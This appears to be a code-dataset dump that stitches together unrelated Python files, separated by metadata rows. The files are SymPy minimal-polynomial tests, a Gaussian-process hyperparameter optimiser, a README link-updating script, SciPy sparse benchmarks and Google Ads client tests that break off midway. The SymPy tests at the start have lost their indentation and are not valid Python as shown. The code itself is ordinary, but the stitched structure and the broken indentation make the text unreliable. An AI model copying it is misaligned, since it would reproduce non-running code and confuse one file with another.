assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(2*sqrt(3), gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(3)/2, gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(3)/2, [S(7)/19, 3], gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(7, 19), QQ(3)], QQ)
def test_IntervalPrinter():
ip = IntervalPrinter()
assert ip.doprint(x**Q(1, 3)) == "x**(mpi('1/3'))"
assert ip.doprint(sqrt(x)) == "x**(mpi('1/2'))"
def test_isolate():
assert isolate(1) == (1, 1)
assert isolate(S(1)/2) == (S(1)/2, S(1)/2)
assert isolate(sqrt(2)) == (1, 2)
assert isolate(-sqrt(2)) == (-2, -1)
assert isolate(sqrt(2), eps=S(1)/100) == (S(24)/17, S(17)/12)
assert isolate(-sqrt(2), eps=S(1)/100) == (-S(17)/12, -S(24)/17)
raises(NotImplementedError, lambda: isolate(I))
def test_minpoly_fraction_field():
assert minimal_polynomial(1/x, y) == -x*y + 1
assert minimal_polynomial(1 / (x + 1), y) == (x + 1)*y - 1
assert minimal_polynomial(sqrt(x), y) == y**2 - x
assert minimal_polynomial(sqrt(x + 1), y) == y**2 - x - 1
assert minimal_polynomial(sqrt(x) / x, y) == x*y**2 - 1
assert minimal_polynomial(sqrt(2) * sqrt(x), y) == y**2 - 2 * x
assert minimal_polynomial(sqrt(2) + sqrt(x), y) == \
y**4 + (-2*x - 4)*y**2 + x**2 - 4*x + 4
assert minimal_polynomial(x**Rational(1,3), y) == y**3 - x
assert minimal_polynomial(x**Rational(1,3) + sqrt(x), y) == \
y**6 - 3*x*y**4 - 2*x*y**3 + 3*x**2*y**2 - 6*x**2*y - x**3 + x**2
assert minimal_polynomial(sqrt(x) / z, y) == z**2*y**2 - x
assert minimal_polynomial(sqrt(x) / (z + 1), y) == (z**2 + 2*z + 1)*y**2 - x
assert minimal_polynomial(1/x, y, polys=True) == Poly(-x*y + 1, y)
assert minimal_polynomial(1 / (x + 1), y, polys=True) == \
Poly((x + 1)*y - 1, y)
assert minimal_polynomial(sqrt(x), y, polys=True) == Poly(y**2 - x, y)
assert minimal_polynomial(sqrt(x) / z, y, polys=True) == \
Poly(z**2*y**2 - x, y)
# this is (sqrt(1 + x**3)/x).integrate(x).diff(x) - sqrt(1 + x**3)/x
a = sqrt(x)/sqrt(1 + x**(-3)) - sqrt(x**3 + 1)/x + 1/(x**(S(5)/2)* \
(1 + x**(-3))**(S(3)/2)) + 1/(x**(S(11)/2)*(1 + x**(-3))**(S(3)/2))
assert minimal_polynomial(a, y) == y
raises(NotAlgebraic, lambda: minimal_polynomial(exp(x), y))
raises(GeneratorsError, lambda: minimal_polynomial(sqrt(x), x))
raises(GeneratorsError, lambda: minimal_polynomial(sqrt(x) - y, x))
raises(NotImplementedError, lambda: minimal_polynomial(sqrt(x), y, compose=False))
@slow
def test_minpoly_fraction_field_slow():
assert minimal_polynomial(minimal_polynomial(sqrt(x**Rational(1,5) - 1),
y).subs(y, sqrt(x**Rational(1,5) - 1)), z) == z
def test_minpoly_domain():
assert minimal_polynomial(sqrt(2), x, domain=QQ.algebraic_field(sqrt(2))) == \
x - sqrt(2)
assert minimal_polynomial(sqrt(8), x, domain=QQ.algebraic_field(sqrt(2))) == \
x - 2*sqrt(2)
assert minimal_polynomial(sqrt(Rational(3,2)), x,
domain=QQ.algebraic_field(sqrt(2))) == 2*x**2 - 3
raises(NotAlgebraic, lambda: minimal_polynomial(y, x, domain=QQ))
| gpl-2.0 | -7,219,002,142,231,568,000 | 37.005312 | 154 | 0.586379 | false | 2.645895 | true | false | false |
pligor/predicting-future-product-prices | 04_time_series_prediction/gp_opt/price_history_27_gp_opt.py | 1 | 6918 | from models.model_21_price_history_seq2seq_dyn_dec_ins import PriceHistorySeq2SeqDynDecIns
import pickle
import dill
from os import path, remove
import numpy as np
from skopt.space.space import Integer, Real, Categorical
from skopt import gp_minimize
import tensorflow as tf
from mylibs.jupyter_notebook_helper import MyOptimizeResult
class PriceHistoryGpOpt(object):
NUM_GPUS = 1
LAMDA2_COUNT = 3
# (silly?) idea: instead of the full training dataset random instances on every bayesian optimization run (not sure about this)
def __init__(self, model, stats_npy_filename, cv_score_dict_npy_filename, res_gp_filename, bayes_opt_dir,
random_state=None, plotter=None, **kwargs):
super(PriceHistoryGpOpt, self).__init__()
self.model = model
self.static_params = kwargs
self.plotter = plotter
self.random_state = random_state
self.stats_filepath = bayes_opt_dir + '/' + stats_npy_filename + '.npy'
self.cv_score_dict_filepath = bayes_opt_dir + '/' + cv_score_dict_npy_filename + '.npy'
self.res_gp_filepath = bayes_opt_dir + '/{}.pickle'.format(res_gp_filename)
def run_opt(self, n_random_starts, n_calls):
if path.isfile(self.res_gp_filepath):
with open(self.res_gp_filepath) as fp: # Python 3: open(..., 'rb')
opt_res = pickle.load(fp)
else:
res_gp = self.gpOptimization(n_random_starts=n_random_starts, n_calls=n_calls)
opt_res = MyOptimizeResult(res_gp=res_gp)
with open(self.res_gp_filepath, 'w') as fp: # Python 3: open(..., 'wb')
pickle.dump(opt_res, fp)
return opt_res
def objective(self, params): # Here we define the metric we want to minimise
params_str = "params: {}".format(params)
print 'num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim, mobile_attrs_dim, lambads'
print params_str
# try:
cv_score, stats_list = self.get_or_calc(params=params)
# save everytime in case it crashes
self.__save_dictionary(filepath=self.stats_filepath, key=params, val=stats_list)
self.__save_dictionary(filepath=self.cv_score_dict_filepath, key=params, val=cv_score)
if self.plotter is not None:
self.plotter(stats_list=stats_list, label_text=params_str)
# except AssertionError:
# cv_score = None
#
# return None
return cv_score # minimize validation error
def get_or_calc(self, params):
params = tuple(params)
if path.isfile(self.cv_score_dict_filepath):
cv_score_dict = np.load(self.cv_score_dict_filepath)[()]
if params in cv_score_dict:
stats_dic = np.load(self.stats_filepath)[()]
assert params in stats_dic, 'if you have created a cv score you must have saved the stats list before'
cv_score, stats_list = cv_score_dict[params], stats_dic[params]
else:
cv_score, stats_list = self.calc(params=params)
else:
cv_score, stats_list = self.calc(params=params)
return cv_score, stats_list
def calc(self, params):
num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim, mobile_attrs_dim = params[
:-self.LAMDA2_COUNT]
lamda2_list = params[-self.LAMDA2_COUNT:]
cv_score, stats_list = self.model.get_cross_validation_score(
enc_num_units=num_units,
dec_num_units=num_units,
keep_prob_rnn_out=keep_prob_rnn_out,
keep_prob_readout=keep_prob_readout,
learning_rate=learning_rate,
rnn_hidden_dim=rnn_hidden_dim,
mobile_attrs_dim=mobile_attrs_dim,
lamda2=lamda2_list,
# DO NOT TEST
decoder_first_input=PriceHistorySeq2SeqDynDecIns.DECODER_FIRST_INPUT.ZEROS,
batch_norm_enabled=True,
**self.static_params
)
return cv_score, stats_list
@staticmethod
def __save_dictionary(filepath, key, val):
if filepath is not None:
stats_dic = np.load(filepath)[()] if path.isfile(filepath) else dict()
stats_dic[tuple(key)] = val
np.save(filepath, stats_dic)
# def __clear_previously_saved_files(self):
# #filepaths = [self.stats_filepath, self.cv_score_dict_filepath]
# filepaths = [self.stats_filepath,]
# for filepath in filepaths:
# if path.isfile(filepath):
# remove(self.stats_filepath) # delete previously saved file
def gpOptimization(self, n_random_starts, n_calls):
# self.__clear_previously_saved_files()
# here we will exploit the information from the previous experiment to calibrate what we think are the best parameters
# best_params = [500, #50 was obviously small so we are going to range it from 300 to 700
# tf.nn.tanh, #activation we are not going to try and guess via gp opt, but just use this one
# 0.0001, #since we had as optimal the smallest one we are going to try and allow also smaller values
# 0.62488034788862112,
# 0.001]
num_units = Integer(300, 600) # the upper limit is mostly because of computational resources
rnn_hidden_dim = Integer(100, 300) # the upper limit is mostly because of computational resources
mobile_attrs_dim = Integer(100, 300) # the upper limit is mostly because of computational resources
keep_prob_rnn_out = Real(0.5, 1.0, prior='uniform') # uniform or log-uniform
keep_prob_readout = Real(0.5, 1.0, prior='uniform')
learning_rate = Real(1e-6, 1e-2, prior='log-uniform') # uniform or log-uniform
lamda2_list = [Real(1e-5, 1e0, prior='log-uniform')] * self.LAMDA2_COUNT # uniform or log-uniform
space = [num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim,
mobile_attrs_dim] + lamda2_list
return gp_minimize(
func=self.objective, # function that we wish to minimise
dimensions=space, # the search space for the hyper-parameters
# x0=x0, #inital values for the hyper-parameters
n_calls=n_calls, # number of times the function will be evaluated
random_state=self.random_state, # random seed
n_random_starts=n_random_starts, # before we start modelling the optimised function with a GP Regression
# model, we want to try a few random choices for the hyper-parameters.
# kappa=1.9, # trade-off between exploration vs. exploitation.
n_jobs=self.NUM_GPUS
)
| agpl-3.0 | -3,510,144,819,399,291,400 | 44.81457 | 131 | 0.616941 | false | 3.666137 | false | false | false |
marcomaccio/python-docs-samples | scripts/auto_link_to_docs.py | 1 | 3864 | #!/usr/bin/env python
# Copyright (C) 2013 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Process docs-links.json and updates all READMEs and replaces
<!-- auto-doc-link --><!-- end-auto-doc-link -->
With a generated list of documentation backlinks.
"""
from collections import defaultdict
import json
import os
import re
REPO_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__),
'..'))
DOC_SITE_ROOT = 'https://cloud.google.com'
AUTO_DOC_LINK_EXP = re.compile(
r'<!-- auto-doc-link -->.*?<!-- end-auto-doc-link -->\n',
re.DOTALL)
def invert_docs_link_map(docs_links):
"""
The docs links map is in this format:
{
"doc_path": [
"file_path",
]
}
This transforms it to:
{
"file_path": [
"doc_path",
]
}
"""
files_to_docs = defaultdict(list)
for doc, files in docs_links.iteritems():
for file in files:
files_to_docs[file].append(doc)
files_to_docs[file] = list(set(files_to_docs[file]))
return files_to_docs
def collect_docs_for_readmes(files_to_docs):
"""
There's a one-to-many relationship between readmes and files. This method
finds the readme for each file and consolidates all docs references.
"""
readmes_to_docs = defaultdict(list)
for file, docs in files_to_docs.iteritems():
readme = get_readme_path(file)
readmes_to_docs[readme].extend(docs)
readmes_to_docs[readme] = list(set(readmes_to_docs[readme]))
return readmes_to_docs
def linkify(docs):
"""Adds the documentation site root to doc paths, creating a full URL."""
return [DOC_SITE_ROOT + x for x in docs]
def replace_contents(file_path, regex, new_content):
with open(file_path, 'r+') as f:
content = f.read()
content = regex.sub(new_content, content)
f.seek(0)
f.write(content)
def get_readme_path(file_path):
"""Gets the readme for an associated sample file, basically just the
README.md in the same directory."""
dir = os.path.dirname(file_path)
readme = os.path.join(
REPO_ROOT, dir, 'README.md')
return readme
def generate_doc_link_statement(docs):
links = linkify(docs)
if len(links) == 1:
return """<!-- auto-doc-link -->
These samples are used on the following documentation page:
> {}
<!-- end-auto-doc-link -->
""".format(links.pop())
else:
return """<!-- auto-doc-link -->
These samples are used on the following documentation pages:
>
{}
<!-- end-auto-doc-link -->
""".format('\n'.join(['* {}'.format(x) for x in links]))
def update_readme(readme_path, docs):
if not os.path.exists(readme_path):
print('{} doesn\'t exist'.format(readme_path))
return
replace_contents(
readme_path,
AUTO_DOC_LINK_EXP,
generate_doc_link_statement(docs))
print('Updated {}'.format(readme_path))
def main():
docs_links = json.load(open(
os.path.join(REPO_ROOT, 'scripts', 'docs-links.json'), 'r'))
files_to_docs = invert_docs_link_map(docs_links)
readmes_to_docs = collect_docs_for_readmes(files_to_docs)
for readme, docs in readmes_to_docs.iteritems():
update_readme(readme, docs)
if __name__ == '__main__':
main()
| apache-2.0 | 8,503,063,250,779,012,000 | 25.833333 | 77 | 0.627329 | false | 3.503173 | false | false | false |
dominicelse/scipy | benchmarks/benchmarks/sparse.py | 1 | 10059 | """
Simple benchmarks for the sparse module
"""
from __future__ import division, print_function, absolute_import
import warnings
import time
import timeit
import numpy
import numpy as np
from numpy import ones, array, asarray, empty, random, zeros
try:
from scipy import sparse
from scipy.sparse import (csr_matrix, coo_matrix, dia_matrix, lil_matrix,
dok_matrix, rand, SparseEfficiencyWarning)
except ImportError:
pass
from .common import Benchmark
def random_sparse(m, n, nnz_per_row):
rows = numpy.arange(m).repeat(nnz_per_row)
cols = numpy.random.randint(0, n, size=nnz_per_row*m)
vals = numpy.random.random_sample(m*nnz_per_row)
return coo_matrix((vals, (rows, cols)), (m, n)).tocsr()
# TODO move this to a matrix gallery and add unittests
def poisson2d(N, dtype='d', format=None):
"""
Return a sparse matrix for the 2D Poisson problem
with standard 5-point finite difference stencil on a
square N-by-N grid.
"""
if N == 1:
diags = asarray([[4]], dtype=dtype)
return dia_matrix((diags, [0]), shape=(1, 1)).asformat(format)
offsets = array([0, -N, N, -1, 1])
diags = empty((5, N**2), dtype=dtype)
diags[0] = 4 # main diagonal
diags[1:] = -1 # all offdiagonals
diags[3, N-1::N] = 0 # first lower diagonal
diags[4, N::N] = 0 # first upper diagonal
return dia_matrix((diags, offsets), shape=(N**2, N**2)).asformat(format)
class Arithmetic(Benchmark):
param_names = ['format', 'XY', 'op']
params = [
['csr'],
['AA', 'AB', 'BA', 'BB'],
['__add__', '__sub__', 'multiply', '__mul__']
]
def setup(self, format, XY, op):
matrices = dict(A=poisson2d(250, format=format),
B=poisson2d(250, format=format)**2)
x = matrices[XY[0]]
self.y = matrices[XY[1]]
self.fn = getattr(x, op)
self.fn(self.y) # warmup
def time_arithmetic(self, format, XY, op):
self.fn(self.y)
class Sort(Benchmark):
params = ['Rand10', 'Rand25', 'Rand50', 'Rand100', 'Rand200']
param_names = ['matrix']
def setup(self, matrix):
n = 10000
if matrix.startswith('Rand'):
k = int(matrix[4:])
self.A = random_sparse(n, n, k)
self.A.has_sorted_indices = False
self.A.indices[:2] = 2, 1
else:
raise NotImplementedError()
def time_sort(self, matrix):
"""sort CSR column indices"""
self.A.sort_indices()
class Matvec(Benchmark):
params = [
['Identity', 'Poisson5pt', 'Block2x2', 'Block3x3'],
['dia', 'csr', 'csc', 'dok', 'lil', 'coo', 'bsr']
]
param_names = ['matrix', 'format']
def setup(self, matrix, format):
if matrix == 'Identity':
if format in ('lil', 'dok'):
raise NotImplementedError()
self.A = sparse.eye(10000, 10000, format=format)
elif matrix == 'Poisson5pt':
self.A = poisson2d(300, format=format)
elif matrix == 'Block2x2':
if format not in ('csr', 'bsr'):
raise NotImplementedError()
b = (2, 2)
self.A = sparse.kron(poisson2d(150),
ones(b)).tobsr(blocksize=b).asformat(format)
elif matrix == 'Block3x3':
if format not in ('csr', 'bsr'):
raise NotImplementedError()
b = (3, 3)
self.A = sparse.kron(poisson2d(100),
ones(b)).tobsr(blocksize=b).asformat(format)
else:
raise NotImplementedError()
self.x = ones(self.A.shape[1], dtype=float)
def time_matvec(self, matrix, format):
self.A * self.x
class Matvecs(Benchmark):
params = ['dia', 'coo', 'csr', 'csc', 'bsr']
param_names = ["format"]
def setup(self, format):
self.A = poisson2d(300, format=format)
self.x = ones((self.A.shape[1], 10), dtype=self.A.dtype)
def time_matvecs(self, format):
self.A * self.x
class Matmul(Benchmark):
def setup(self):
H1, W1 = 1, 100000
H2, W2 = W1, 1000
C1 = 10
C2 = 1000000
random.seed(0)
matrix1 = lil_matrix(zeros((H1, W1)))
matrix2 = lil_matrix(zeros((H2, W2)))
for i in range(C1):
matrix1[random.randint(H1), random.randint(W1)] = random.rand()
for i in range(C2):
matrix2[random.randint(H2), random.randint(W2)] = random.rand()
self.matrix1 = matrix1.tocsr()
self.matrix2 = matrix2.tocsr()
def time_large(self):
for i in range(100):
self.matrix1 * self.matrix2
class Construction(Benchmark):
params = [
['Empty', 'Identity', 'Poisson5pt'],
['lil', 'dok']
]
param_names = ['matrix', 'format']
def setup(self, name, format):
if name == 'Empty':
self.A = coo_matrix((10000, 10000))
elif name == 'Identity':
self.A = sparse.eye(10000, format='coo')
else:
self.A = poisson2d(100, format='coo')
formats = {'lil': lil_matrix, 'dok': dok_matrix}
self.cls = formats[format]
def time_construction(self, name, format):
T = self.cls(self.A.shape)
for i, j, v in zip(self.A.row, self.A.col, self.A.data):
T[i, j] = v
class Conversion(Benchmark):
params = [
['csr', 'csc', 'coo', 'dia', 'lil', 'dok'],
['csr', 'csc', 'coo', 'dia', 'lil', 'dok'],
]
param_names = ['from_format', 'to_format']
def setup(self, fromfmt, tofmt):
base = poisson2d(100, format=fromfmt)
try:
self.fn = getattr(base, 'to' + tofmt)
except:
def fn():
raise RuntimeError()
self.fn = fn
def time_conversion(self, fromfmt, tofmt):
self.fn()
class Getset(Benchmark):
params = [
[1, 10, 100, 1000, 10000],
['different', 'same'],
['csr', 'csc', 'lil', 'dok']
]
param_names = ['N', 'sparsity pattern', 'format']
unit = "seconds"
def setup(self, N, sparsity_pattern, format):
if format == 'dok' and N > 500:
raise NotImplementedError()
self.A = rand(1000, 1000, density=1e-5)
A = self.A
N = int(N)
# indices to assign to
i, j = [], []
while len(i) < N:
n = N - len(i)
ip = numpy.random.randint(0, A.shape[0], size=n)
jp = numpy.random.randint(0, A.shape[1], size=n)
i = numpy.r_[i, ip]
j = numpy.r_[j, jp]
v = numpy.random.rand(n)
if N == 1:
i = int(i)
j = int(j)
v = float(v)
base = A.asformat(format)
self.m = base.copy()
self.i = i
self.j = j
self.v = v
def _timeit(self, kernel, recopy):
min_time = 1e99
if not recopy:
kernel(self.m, self.i, self.j, self.v)
number = 1
start = time.time()
while time.time() - start < 0.1:
if recopy:
m = self.m.copy()
else:
m = self.m
while True:
duration = timeit.timeit(
lambda: kernel(m, self.i, self.j, self.v), number=number)
if duration > 1e-5:
break
else:
number *= 10
min_time = min(min_time, duration/number)
return min_time
def track_fancy_setitem(self, N, sparsity_pattern, format):
def kernel(A, i, j, v):
A[i, j] = v
with warnings.catch_warnings():
warnings.simplefilter('ignore', SparseEfficiencyWarning)
return self._timeit(kernel, sparsity_pattern == 'different')
def time_fancy_getitem(self, N, sparsity_pattern, format):
self.m[self.i, self.j]
class NullSlice(Benchmark):
params = [[0.05, 0.01], ['csr', 'csc', 'lil']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 100000
k = 1000
self.X = sparse.rand(n, k, format=format, density=density)
def time_getrow(self, density, format):
self.X.getrow(100)
def time_getcol(self, density, format):
self.X.getcol(100)
def time_3_rows(self, density, format):
self.X[[0, 100, 105], :]
def time_10000_rows(self, density, format):
self.X[np.arange(10000), :]
def time_3_cols(self, density, format):
self.X[:, [0, 100, 105]]
def time_100_cols(self, density, format):
self.X[:, np.arange(100)]
class Diagonal(Benchmark):
params = [[0.01, 0.1, 0.5], ['csr', 'csc', 'coo', 'lil', 'dok', 'dia']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 1000
if format == 'dok' and n * density >= 500:
raise NotImplementedError()
self.X = sparse.rand(n, n, format=format, density=density)
def time_diagonal(self, density, format):
self.X.diagonal()
class Sum(Benchmark):
params = [[0.01, 0.1, 0.5], ['csr', 'csc', 'coo', 'lil', 'dok', 'dia']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 1000
if format == 'dok' and n * density >= 500:
raise NotImplementedError()
self.X = sparse.rand(n, n, format=format, density=density)
def time_sum(self, density, format):
self.X.sum()
def time_sum_axis0(self, density, format):
self.X.sum(axis=0)
def time_sum_axis1(self, density, format):
self.X.sum(axis=1)
class Iteration(Benchmark):
params = [[0.05, 0.01], ['csr', 'csc', 'lil']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 500
k = 1000
self.X = sparse.rand(n, k, format=format, density=density)
def time_iteration(self, density, format):
for row in self.X:
pass
| bsd-3-clause | 3,352,419,571,991,209,000 | 27.019499 | 77 | 0.532856 | false | 3.363089 | false | false | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/tests/unit/gapic/googleads.v8/services/test_custom_audience_service.py | 1 | 35288 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from unittest import mock
import grpc
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.ads.googleads.v8.enums.types import custom_audience_member_type
from google.ads.googleads.v8.enums.types import custom_audience_status
from google.ads.googleads.v8.enums.types import custom_audience_type
from google.ads.googleads.v8.resources.types import custom_audience
from google.ads.googleads.v8.services.services.custom_audience_service import CustomAudienceServiceClient
from google.ads.googleads.v8.services.services.custom_audience_service import transports
from google.ads.googleads.v8.services.types import custom_audience_service
from google.api_core import client_options
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CustomAudienceServiceClient._get_default_mtls_endpoint(None) is None
assert CustomAudienceServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
def test_custom_audience_service_client_from_service_account_info():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = CustomAudienceServiceClient.from_service_account_info(info)
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_client_from_service_account_file():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = CustomAudienceServiceClient.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
client = CustomAudienceServiceClient.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_client_get_transport_class():
transport = CustomAudienceServiceClient.get_transport_class()
assert transport == transports.CustomAudienceServiceGrpcTransport
transport = CustomAudienceServiceClient.get_transport_class("grpc")
assert transport == transports.CustomAudienceServiceGrpcTransport
@mock.patch.object(CustomAudienceServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CustomAudienceServiceClient))
def test_custom_audience_service_client_client_options():
# Check that if channel is provided we won't create a new one.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.CustomAudienceServiceClient.get_transport_class') as gtc:
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials()
)
client = CustomAudienceServiceClient(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.CustomAudienceServiceClient.get_transport_class') as gtc:
client = CustomAudienceServiceClient(transport="grpc")
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient(client_options=options)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT
# is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = CustomAudienceServiceClient()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = CustomAudienceServiceClient()
@mock.patch.object(CustomAudienceServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CustomAudienceServiceClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
@pytest.mark.parametrize("use_client_cert_env", ["true", "false"])
def test_custom_audience_service_client_mtls_env_auto(use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
ssl_channel_creds = mock.Mock()
with mock.patch('grpc.ssl_channel_credentials', return_value=ssl_channel_creds):
grpc_transport.return_value = None
client = CustomAudienceServiceClient(client_options=options)
if use_client_cert_env == "false":
expected_ssl_channel_creds = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_ssl_channel_creds = ssl_channel_creds
expected_host = client.DEFAULT_MTLS_ENDPOINT
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
with mock.patch('google.auth.transport.grpc.SslCredentials.ssl_credentials', new_callable=mock.PropertyMock) as ssl_credentials_mock:
if use_client_cert_env == "false":
is_mtls_mock.return_value = False
ssl_credentials_mock.return_value = None
expected_host = client.DEFAULT_ENDPOINT
expected_ssl_channel_creds = None
else:
is_mtls_mock.return_value = True
ssl_credentials_mock.return_value = mock.Mock()
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_ssl_channel_creds = ssl_credentials_mock.return_value
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
is_mtls_mock.return_value = False
